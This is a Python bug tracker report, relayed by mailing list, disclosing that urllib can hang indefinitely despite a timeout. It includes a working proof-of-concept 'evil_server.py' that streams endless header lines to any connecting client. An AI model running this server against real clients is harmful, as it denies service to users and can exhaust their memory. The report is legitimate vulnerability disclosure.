New submission from guangli dong <leve...@gmail.com>:
if a client request a http/https/ftp service which is controlled by attacker, attacker can make this client hang forever, event client has set "timeout" argument. maybe this client also will consume more and more memory. i does not test on this conclusion. client.py ``` import urllib.request req = urllib.request.Request('http://127.0.0.1:8085') response = urllib.request.urlopen(req, timeout=1) ``` evil_server.py ``` # coding:utf-8 from socket import * from multiprocessing import * from time import sleep def dealWithClient(newSocket,destAddr): recvData = newSocket.recv(1024) newSocket.send(b"""HTTP/1.1 100 OK\n""") while True: # recvData = newSocket.recv(1024) newSocket.send(b"""x:a\n""") if len(recvData)>0: # print('recv[%s]:%s'%(str(destAddr), recvData)) pass else: print('[%s]close'%str(destAddr)) sleep(10) print('over') break # newSocket.close() def main(): serSocket = socket(AF_INET, SOCK_STREAM) serSocket.setsockopt(SOL_SOCKET, SO_REUSEADDR , 1) localAddr = ('', 8085) serSocket.bind(localAddr) serSocket.listen(5) try: while True: newSocket,destAddr = serSocket.accept() client = Process(target=dealWithClient, args=(newSocket,destAddr)) client.start() newSocket.close() finally: serSocket.close() if __name__ == '__main__': main() ``` ---------- components: Library (Lib) messages: 392825 nosy: leveryd priority: normal severity: normal status: open title: "urllib" will result to deny of service type: security versions: Python 3.7 _______________________________________ Python tracker <rep...@bugs.python.org> <https://bugs.python.org/issue44022> _______________________________________ _______________________________________________ Python-bugs-list mailing list Unsubscribe: https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com